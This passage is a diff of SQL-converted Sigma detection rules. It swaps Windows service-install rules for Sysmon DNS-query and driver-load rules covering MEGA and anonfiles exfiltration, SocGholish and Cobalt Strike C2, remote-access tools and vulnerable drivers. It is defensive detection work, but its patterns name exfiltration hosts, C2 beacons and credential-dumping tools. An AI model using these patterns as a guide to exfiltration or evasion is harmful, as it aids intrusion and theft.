"id": "613c03ba-0779-4a53-8a1f-47f914a4ded3", + "status": "test", + "description": "Detects DNS queries for subdomains used for upload to MEGA.io", + "author": "Aaron Greetham (@beardofbinary) - NCC Group", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.exfiltration", + "attack.t1567.002" ], "falsepositives": [ - "Unknown" + "Legitimate DNS queries and usage of Mega" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%&&%' ESCAPE '\\' AND ImagePath LIKE '%rundll32%' ESCAPE '\\' AND ImagePath LIKE '%shell32.dll%' ESCAPE '\\' AND ImagePath LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND (ImagePath LIKE '%value%' ESCAPE '\\' OR ImagePath LIKE '%invoke%' ESCAPE '\\' OR ImagePath LIKE '%comspec%' ESCAPE '\\' OR ImagePath LIKE '%iex%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '22' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND QueryName LIKE '%userstorage.mega.co.nz%' ESCAPE '\\')" ], - "filename": "win_system_invoke_obfuscation_via_use_rundll32_services.yml" + "filename": "dns_query_win_mega_nz.yml" }, { - "title": "DHCP Server Error Failed Loading the CallOut DLL", - "id": "75edd3fd-7146-48e5-9848-3013d7f0282c", + "title": "DNS HybridConnectionManager Service Bus", + "id": "7bd3902d-8b8b-4dd4-838a-c6862d40150d", "status": "test", - "description": "This rule detects a DHCP server error in which a specified Callout DLL (in registry) could not be loaded", - "author": "Dimitrios Slamaris, @atc_project (fix)", + "description": "Detects Azure Hybrid Connection Manager services querying the Azure service bus service", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.defense_evasion", - "attack.t1574.002" + "attack.persistence", + "attack.t1554" ], "falsepositives": [ - "Unknown" + "Legitimate use of Azure Hybrid Connection Manager and the 
Azure Service Bus service" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND EventID IN ('1031', '1032', '1034') AND Provider_Name = 'Microsoft-Windows-DHCP-Server')" + "SELECT * FROM logs WHERE (EventID = '22' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND QueryName LIKE '%servicebus.windows.net%' ESCAPE '\\' AND Image LIKE '%HybridConnectionManager%' ESCAPE '\\')" ], - "filename": "win_system_susp_dhcp_config_failed.yml" + "filename": "dns_query_win_hybridconnectionmgr_servicebus.yml" }, { - "title": "Invoke-Obfuscation VAR+ Launcher - System", - "id": "8ca7004b-e620-4ecb-870e-86129b5b8e75", + "title": "Potential SocGholish Second Stage C2 DNS Query", + "id": "70761fe8-6aa2-4f80-98c1-a57049c08e66", "status": "experimental", - "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "description": "Detects a DNS query initiated from a \"wscript\" process for domains matching a specific pattern that was seen being used by SocGholish for its Command and Control traffic", + "author": "Dusty Miller", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Unknown" + "Legitimate domain names matching the regex pattern by chance (e.g. 
domain controllers dc01.company.co.uk)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%cmd%' ESCAPE '\\' AND ImagePath LIKE '%\"set%' ESCAPE '\\' AND ImagePath LIKE '%-f%' ESCAPE '\\' AND (ImagePath LIKE '%/c%' ESCAPE '\\' OR ImagePath LIKE '%/r%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '22' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\wscript.exe' ESCAPE '\\' AND QueryName REGEXP '[a-f0-9]{4,8}\\.(?:[a-z0-9\\-]+\\.){2}[a-z0-9\\-]+')" ], - "filename": "win_system_invoke_obfuscation_var_services.yml" + "filename": "dns_query_win_malware_socgholish_second_stage_c2.yml" }, { - "title": "Service Installation in Suspicious Folder", - "id": "5e993621-67d4-488a-b9ae-b420d08b96cb", + "title": "DNS Query for Anonfiles.com Domain - Sysmon", + "id": "065cceea-77ec-4030-9052-fc0affea7110", "status": "experimental", - "description": "Detects service installation in suspicious folder appdata", + "description": "Detects DNS queries for \"anonfiles.com\", which is an anonymous file upload platform often used for malicious purposes", "author": "pH-T (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "car.2013-09-005", - "attack.t1543.003" + "attack.exfiltration", + "attack.t1567.002" ], "falsepositives": [ - "Unknown" + "Rare legitimate access to anonfiles.com" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045' AND (ImagePath LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR ImagePath LIKE '%\\\\\\\\127.0.0.1%' ESCAPE '\\' OR ImagePath LIKE '%\\\\\\\\localhost%' ESCAPE '\\')) AND NOT ((ServiceName = 'Zoom Sharing Service' AND ImagePath LIKE '\"C:\\\\Program Files\\\\Common Files\\\\Zoom\\\\Support\\\\CptService.exe%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '22' AND 
Channel = 'Microsoft-Windows-Sysmon/Operational' AND QueryName LIKE '%.anonfiles.com%' ESCAPE '\\')" ], - "filename": "win_system_susp_service_installation_folder.yml" + "filename": "dns_query_win_anonymfiles_com.yml" }, { - "title": "PAExec Service Installation", - "id": "de7ce410-b3fb-4e8a-b38c-3b999e2c3420", - "status": "experimental", - "description": "Detects PAExec service installation", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious DNS Query for IP Lookup Service APIs", + "id": "ec82e2a5-81ea-4211-a1f8-37a0286df2c2", + "status": "test", + "description": "Detects DNS queries for IP lookup services such as \"api.ipify.org\" originating from a non browser process.", + "author": "Brandon George (blog post), Thomas Patzke (rule)", "tags": [ - "attack.execution", - "attack.t1569.002" + "attack.reconnaissance", + "attack.t1590" ], "falsepositives": [ - "Unknown" + "Legitimate usage of IP lookup services such as ipify API" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND (ServiceName LIKE 'PAExec-%' ESCAPE '\\' OR ImagePath LIKE 'C:\\\\WINDOWS\\\\PAExec-%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '22' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (QueryName LIKE '%api.2ip.ua%' ESCAPE '\\' OR QueryName LIKE '%api.ipify.org%' ESCAPE '\\' OR QueryName LIKE '%bot.whatismyipaddress.com%' ESCAPE '\\' OR QueryName LIKE '%canireachthe.net%' ESCAPE '\\' OR QueryName LIKE '%checkip.amazonaws.com%' ESCAPE '\\' OR QueryName LIKE '%checkip.dyndns.org%' ESCAPE '\\' OR QueryName LIKE '%curlmyip.com%' ESCAPE '\\' OR QueryName LIKE '%edns.ip-api.com%' ESCAPE '\\' OR QueryName LIKE '%eth0.me%' ESCAPE '\\' OR QueryName LIKE '%freegeoip.app%' ESCAPE '\\' OR QueryName LIKE '%icanhazip.com%' ESCAPE '\\' OR QueryName LIKE '%ident.me%' ESCAPE '\\' OR QueryName LIKE '%ifconfig.io%' ESCAPE '\\' OR QueryName LIKE '%ifconfig.me%' 
ESCAPE '\\' OR QueryName LIKE '%ip-api.com%' ESCAPE '\\' OR QueryName LIKE '%ip.anysrc.net%' ESCAPE '\\' OR QueryName LIKE '%ip.tyk.nu%' ESCAPE '\\' OR QueryName LIKE '%ipaddressworld.com%' ESCAPE '\\' OR QueryName LIKE '%ipecho.net%' ESCAPE '\\' OR QueryName LIKE '%ipinfo.io%' ESCAPE '\\' OR QueryName LIKE '%ipof.in%' ESCAPE '\\' OR QueryName LIKE '%ipv4.icanhazip.com%' ESCAPE '\\' OR QueryName LIKE '%ipv4bot.whatismyipaddress.com%' ESCAPE '\\' OR QueryName LIKE '%ipwho.is%' ESCAPE '\\' OR QueryName LIKE '%l2.io%' ESCAPE '\\' OR QueryName LIKE '%myexternalip.com%' ESCAPE '\\' OR QueryName LIKE '%wgetip.com%' ESCAPE '\\' OR QueryName LIKE '%whatismyip.akamai.com%' ESCAPE '\\' OR QueryName LIKE '%wtfismyip.com%' ESCAPE '\\') AND NOT ((Image LIKE '%\\\\brave.exe' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files (x86)\\\\Internet Explorer\\\\iexplore.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Internet Explorer\\\\iexplore.exe' ESCAPE '\\')) OR (Image LIKE '%\\\\maxthon.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeWebView\\\\Application\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\WindowsApps\\\\MicrosoftEdge.exe' ESCAPE '\\' OR (Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeCore\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Microsoft\\\\EdgeCore\\\\%' ESCAPE '\\') AND (Image LIKE '%\\\\msedge.exe' ESCAPE '\\' OR Image LIKE 
'%\\\\msedgewebview2.exe' ESCAPE '\\')) OR (Image LIKE '%\\\\opera.exe' ESCAPE '\\') OR (Image LIKE '%\\\\safari.exe' ESCAPE '\\') OR (Image LIKE '%\\\\seamonkey.exe' ESCAPE '\\') OR (Image LIKE '%\\\\vivaldi.exe' ESCAPE '\\') OR (Image LIKE '%\\\\whale.exe' ESCAPE '\\')))" ], - "filename": "win_system_service_install_paexec.yml" + "filename": "dns_query_win_susp_ipify.yml" }, { - "title": "StoneDrill Service Install", - "id": "9e987c6c-4c1e-40d8-bd85-dd26fba8fdd6", - "status": "test", - "description": "This method detects a service install of the malicious Microsoft Network Realtime Inspection Service service described in StoneDrill report by Kaspersky", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious LDAP Domain Access", + "id": "a21bcd7e-38ec-49ad-b69a-9ea17e69509e", + "status": "experimental", + "description": "Detect suspicious LDAP request from non-Windows application", + "author": "frack113", "tags": [ - "attack.persistence", - "attack.g0064", - "attack.t1543.003" + "attack.discovery", + "attack.t1482" ], "falsepositives": [ - "Unlikely" + "Programs that also lookup the observed domain" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName = 'NtsSrv' AND ImagePath LIKE '% LocalService' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '22' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND QueryName LIKE '\\_ldap.%' ESCAPE '\\' AND NOT ((Image LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\') OR ((Image LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\MsMpEng.exe%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Windows Defender\\\\MsMpEng.exe%' ESCAPE '\\') AND Image LIKE '%\\\\MsMpEng.exe' ESCAPE '\\') OR (Image = '') OR (Image LIKE 'C:\\\\WindowsAzure\\\\GuestAgent%' ESCAPE '\\')))" ], - "filename": 
"win_system_apt_stonedrill.yml" + "filename": "dns_query_win_susp_ldap.yml" }, { - "title": "ProcessHacker Privilege Elevation", - "id": "c4ff1eac-84ad-44dd-a6fb-d56a92fc43a9", + "title": "Suspicious TeamViewer Domain Access", + "id": "778ba9a8-45e4-4b80-8e3e-34a419f0b85e", "status": "test", - "description": "Detects a ProcessHacker tool that elevated privileges to a very high level", + "description": "Detects DNS queries to a TeamViewer domain only resolved by a TeamViewer client by an image that isn't named TeamViewer (sometimes used by threat actors for obfuscation)", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.privilege_escalation", - "attack.t1543.003", - "attack.t1569.002" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Unlikely" + "Unknown binary names of TeamViewer", + "Other programs that also lookup the observed domain" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName LIKE 'ProcessHacker%' ESCAPE '\\' AND AccountName = 'LocalSystem')" + "SELECT * FROM logs WHERE ((EventID = '22' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND QueryName IN ('taf.teamviewer.com', 'udp.ping.teamviewer.com') AND NOT (Image LIKE '%TeamViewer%' ESCAPE '\\'))" ], - "filename": "win_system_susp_proceshacker.yml" + "filename": "dns_query_win_susp_teamviewer.yml" }, { - "title": "Sysmon Crash", - "id": "4d7f1827-1637-4def-8d8a-fd254f9454df", + "title": "DNS Query for Ufile.io Upload Domain - Sysmon", + "id": "1cbbeaaf-3c8c-4e4c-9d72-49485b6a176b", "status": "experimental", - "description": "Detects application popup reporting a failure of the Sysmon service", - "author": "Tim Shelton", + "description": "Detects DNS queries to \"ufile.io\". 
Which is often abused by malware for upload and exfiltration", + "author": "yatinwad and TheDFIRReport", "tags": [ - "attack.defense_evasion", - "attack.t1562" + "attack.exfiltration", + "attack.t1567.002" ], "falsepositives": [ - "Unknown" + "Legitimate DNS queries and usage of Ufile" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Application Popup' AND EventID = '26' AND Caption = 'sysmon64.exe - Application Error')" + "SELECT * FROM logs WHERE (EventID = '22' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND QueryName LIKE '%ufile.io%' ESCAPE '\\')" ], - "filename": "win_system_application_sysmon_crash.yml" + "filename": "dns_query_win_ufile_io.yml" }, { - "title": "Eventlog Cleared", - "id": "a62b37e0-45d3-48d9-a517-90c1a1b0186b", + "title": "DNS Query To Remote Access Software Domain", + "id": "4d07b1f4-cb00-4470-b9f8-b0191d48ff52", "status": "experimental", - "description": "One of the Windows Eventlogs has been cleared. e.g. caused by \"wevtutil cl\" command execution", - "author": "Florian Roth (Nextron Systems)", + "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. 
(Citation: Symantec Living off the Land)\n", + "author": "frack113, Connor Martin", "tags": [ - "attack.defense_evasion", - "attack.t1070.001", - "car.2016-04-002" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Rollout of log collection agents (the setup routine often includes a reset of the local Eventlog)", - "System provisioning (system reset before the golden image creation)" + "Likely with other browser software" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND (EventID = '104' AND Provider_Name = 'Microsoft-Windows-Eventlog') AND NOT (Channel IN ('System', 'Security', 'Application')))" + "SELECT * FROM logs WHERE ((EventID = '22' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (QueryName LIKE '%.getgo.com' ESCAPE '\\' OR QueryName LIKE '%.logmein.com' ESCAPE '\\' OR QueryName LIKE '%.ammyy.com' ESCAPE '\\' OR QueryName LIKE '%.netsupportsoftware.com' ESCAPE '\\' OR QueryName LIKE '%remoteutilities.com' ESCAPE '\\' OR QueryName LIKE '%.net.anydesk.com' ESCAPE '\\' OR QueryName LIKE '%api.playanext.com' ESCAPE '\\' OR QueryName LIKE '%.relay.splashtop.com' ESCAPE '\\' OR QueryName LIKE '%.api.splashtop.com' ESCAPE '\\' OR QueryName LIKE '%app.atera.com' ESCAPE '\\' OR QueryName LIKE '%.agentreporting.atera.com' ESCAPE '\\' OR QueryName LIKE '%.pubsub.atera.com' ESCAPE '\\' OR QueryName LIKE '%logmeincdn.http.internapcdn.net' ESCAPE '\\' OR QueryName LIKE '%logmein-gateway.com' ESCAPE '\\' OR QueryName LIKE '%client.teamviewer.com' ESCAPE '\\' OR QueryName LIKE '%integratedchat.teamviewer.com' ESCAPE '\\' OR QueryName LIKE '%static.remotepc.com' ESCAPE '\\' OR QueryName LIKE '%.n-able.com' ESCAPE '\\' OR QueryName LIKE '%comserver.corporate.beanywhere.com' ESCAPE '\\' OR QueryName LIKE '%.swi-rc.com' ESCAPE '\\' OR QueryName LIKE '%.swi-tc.com' ESCAPE '\\' OR QueryName LIKE '%telemetry.servers.qetqo.com' ESCAPE '\\' OR QueryName LIKE '%relay.screenconnect.com' ESCAPE '\\' OR QueryName LIKE 
'%control.connectwise.com' ESCAPE '\\' OR QueryName LIKE '%express.gotoassist.com' ESCAPE '\\' OR QueryName LIKE '%authentication.logmeininc.com' ESCAPE '\\' OR QueryName LIKE '%.services.vnc.com' ESCAPE '\\' OR QueryName LIKE '%.tmate.io' ESCAPE '\\' OR QueryName LIKE '%api.parsec.app' ESCAPE '\\' OR QueryName LIKE '%parsecusercontent.com' ESCAPE '\\' OR QueryName LIKE '%remotedesktop-pa.googleapis.com' ESCAPE '\\' OR QueryName LIKE '%.logmein-gateway.com' ESCAPE '\\' OR QueryName LIKE '%secure.logmeinrescue.com' ESCAPE '\\' OR QueryName LIKE '%join.zoho.com' ESCAPE '\\' OR QueryName LIKE '%assist.zoho.com' ESCAPE '\\' OR QueryName LIKE '%.zohoassist.com' ESCAPE '\\' OR QueryName LIKE '%downloads.zohocdn.com' ESCAPE '\\' OR QueryName LIKE '%agent.jumpcloud.com' ESCAPE '\\' OR QueryName LIKE '%kickstart.jumpcloud.com' ESCAPE '\\' OR QueryName LIKE '%cdn.kaseya.net' ESCAPE '\\' OR QueryName LIKE '%relay.kaseya.net' ESCAPE '\\' OR QueryName LIKE '%license.bomgar.com' ESCAPE '\\' OR QueryName LIKE '%.beyondtrustcloud.com' ESCAPE '\\') AND NOT ((Image LIKE '%\\\\brave.exe' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files (x86)\\\\Internet Explorer\\\\iexplore.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Internet Explorer\\\\iexplore.exe' ESCAPE '\\')) OR (Image LIKE '%\\\\maxthon.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeWebView\\\\Application\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\WindowsApps\\\\MicrosoftEdge.exe' ESCAPE '\\' OR (Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe' ESCAPE '\\' OR Image LIKE 
'C:\\\\Program Files\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeCore\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Microsoft\\\\EdgeCore\\\\%' ESCAPE '\\') AND (Image LIKE '%\\\\msedge.exe' ESCAPE '\\' OR Image LIKE '%\\\\msedgewebview2.exe' ESCAPE '\\')) OR (Image LIKE '%\\\\opera.exe' ESCAPE '\\') OR (Image LIKE '%\\\\safari.exe' ESCAPE '\\') OR (Image LIKE '%\\\\seamonkey.exe' ESCAPE '\\') OR (Image LIKE '%\\\\vivaldi.exe' ESCAPE '\\') OR (Image LIKE '%\\\\whale.exe' ESCAPE '\\')))" ], - "filename": "win_system_eventlog_cleared.yml" + "filename": "dns_query_win_remote_access_software_domains.yml" }, { - "title": "Invoke-Obfuscation Via Stdin - System", - "id": "487c7524-f892-4054-b263-8a0ace63fc25", - "status": "experimental", - "description": "Detects Obfuscated Powershell via Stdin in Scripts", - "author": "Nikita Nazarov, oscd.community", + "title": "Suspicious Cobalt Strike DNS Beaconing - Sysmon", + "id": "f356a9c4-effd-4608-bbf8-408afd5cd006", + "status": "test", + "description": "Detects a program that invoked suspicious DNS queries known from Cobalt Strike beacons", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.command_and_control", + "attack.t1071.004" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%set%' ESCAPE '\\' AND ImagePath LIKE '%&&%' ESCAPE '\\' AND (ImagePath LIKE '%environment%' ESCAPE '\\' OR ImagePath LIKE '%invoke%' ESCAPE '\\' OR ImagePath LIKE '%input%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '22' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((QueryName LIKE 'aaa.stage.%' ESCAPE '\\' OR QueryName LIKE 'post.1%' ESCAPE '\\') OR QueryName 
LIKE '%.stage.123456.%' ESCAPE '\\'))" ], - "filename": "win_system_invoke_obfuscation_via_stdin_services.yml" + "filename": "dns_query_win_mal_cobaltstrike.yml" }, { - "title": "Sliver C2 Default Service Installation", - "id": "31c51af6-e7aa-4da7-84d4-8f32cc580af2", + "title": "Vulnerable HackSys Extreme Vulnerable Driver Load", + "id": "295c9289-acee-4503-a571-8eacaef36b28", "status": "experimental", - "description": "Detects known malicious service installation that appear in cases in which a Sliver implants execute the PsExec commands", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali", + "description": "Detects the load of HackSys Extreme Vulnerable Driver which is an intentionally vulnerable Windows driver developed for security enthusiasts to learn and polish their exploitation skills at Kernel level and often abused by threat actors", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", "attack.privilege_escalation", - "attack.t1543.003", - "attack.t1569.002" + "attack.t1543.003" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND (ImagePath REGEXP '^[a-zA-Z]:\\\\windows\\\\temp\\\\[a-zA-Z0-9]{10}\\.exe' OR ServiceName IN ('Sliver', 'Sliver implant')))" + "SELECT * FROM logs WHERE ((EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ImageLoaded LIKE '%\\\\HEVD.sys' ESCAPE '\\' OR (Hashes LIKE '%IMPHASH=f26d0b110873a1c7d8c4f08fbeab89c5%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=c46ea2e651fd5f7f716c8867c6d13594%' ESCAPE '\\') OR Imphash IN ('f26d0b110873a1c7d8c4f08fbeab89c5', 'c46ea2e651fd5f7f716c8867c6d13594')))" ], - "filename": "win_system_service_install_sliver.yml" + "filename": "driver_load_win_vuln_hevd_driver.yml" }, { - "title": "Hacktool Service Registration or Execution", - "id": "d26ce60c-2151-403c-9a42-49420d87b5e4", - "status": 
"test", - "description": "Detects PsExec service installation and execution events (service and Sysmon)", + "title": "WinDivert Driver Load", + "id": "679085d5-f427-4484-9f58-1dc30a7c426d", + "status": "experimental", + "description": "Detects the load of the Windiver driver, a powerful user-mode capture/sniffing/modification/blocking/re-injection package for Windows", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1569.002", - "attack.s0029" + "attack.collection", + "attack.defense_evasion", + "attack.t1599.001", + "attack.t1557.001" ], "falsepositives": [ - "Unknown" + "Legitimate WinDivert driver usage" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID IN ('7045', '7036')) AND ((ServiceName LIKE '%WCESERVICE%' ESCAPE '\\' OR ServiceName LIKE '%WCE SERVICE%' ESCAPE '\\' OR ServiceName LIKE '%winexesvc%' ESCAPE '\\' OR ServiceName LIKE '%DumpSvc%' ESCAPE '\\' OR ServiceName LIKE '%pwdump%' ESCAPE '\\' OR ServiceName LIKE '%gsecdump%' ESCAPE '\\' OR ServiceName LIKE '%cachedump%' ESCAPE '\\') OR ImagePath LIKE '%bypass%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ImageLoaded LIKE '%\\\\WinDivert.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WinDivert64.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\NordDivert.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\lingtiwfp.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\eswfp.sys%' ESCAPE '\\') OR (Hashes LIKE '%IMPHASH=0604bb7cb4bb851e2168d5c7d9399087%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=2e5f0e649d97f32b03c09e4686d0574f%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=52f8aa269f69f0edad9e8fcdaedce276%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=c0e5d314da39dbf65a2dbff409cc2c76%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=58623490691babe8330adc81cd04a663%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=8ee39b48656e4d6b8459d7ba7da7438b%' ESCAPE '\\' OR Hashes LIKE 
'%IMPHASH=45ee545ae77e8d43fc70ede9efcd4c96%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=a1b2e245acd47e4a348e1a552a02859a%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=2a5f85fe4609461c6339637594fa9b0a%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6b2c6f95233c2914d1d488ee27531acc%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9f2fdd3f9ab922bbb0560a7df46f4342%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=d8a719865c448b1bd2ec241e46ac1c88%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0ea54f8c9af4a2fe8367fa457f48ed38%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9d519ae0a0864d6d6ae3f8b6c9c70af6%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=a74929edfc3289895e3f2885278947ae%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=a66b476c2d06c370f0a53b5537f2f11e%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=bdcd836a46bc2415773f6b5ea77a46e4%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=c28cd6ccd83179e79dac132a553693d9%' ESCAPE '\\') OR Imphash IN ('0604bb7cb4bb851e2168d5c7d9399087', '2e5f0e649d97f32b03c09e4686d0574f', '52f8aa269f69f0edad9e8fcdaedce276', 'c0e5d314da39dbf65a2dbff409cc2c76', '58623490691babe8330adc81cd04a663', '8ee39b48656e4d6b8459d7ba7da7438b', '45ee545ae77e8d43fc70ede9efcd4c96', 'a1b2e245acd47e4a348e1a552a02859a', '2a5f85fe4609461c6339637594fa9b0a', '6b2c6f95233c2914d1d488ee27531acc', '9f2fdd3f9ab922bbb0560a7df46f4342', 'd8a719865c448b1bd2ec241e46ac1c88', '0ea54f8c9af4a2fe8367fa457f48ed38', '9d519ae0a0864d6d6ae3f8b6c9c70af6', 'a74929edfc3289895e3f2885278947ae', 'a66b476c2d06c370f0a53b5537f2f11e', 'bdcd836a46bc2415773f6b5ea77a46e4', 'c28cd6ccd83179e79dac132a553693d9')))" ], - "filename": "win_system_service_install_hacktools.yml" + "filename": "driver_load_win_windivert.yml" }, { - "title": "Invoke-Obfuscation Via Use Clip - System", - "id": "63e3365d-4824-42d8-8b82-e56810fefa0c", + "title": "Vulnerable Lenovo Driver Load", + "id": "ac683a42-877b-4ff8-91ac-69e94b0f70b4", "status": "experimental", - "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", - "author": "Nikita Nazarov, oscd.community", + "description": "Detects 
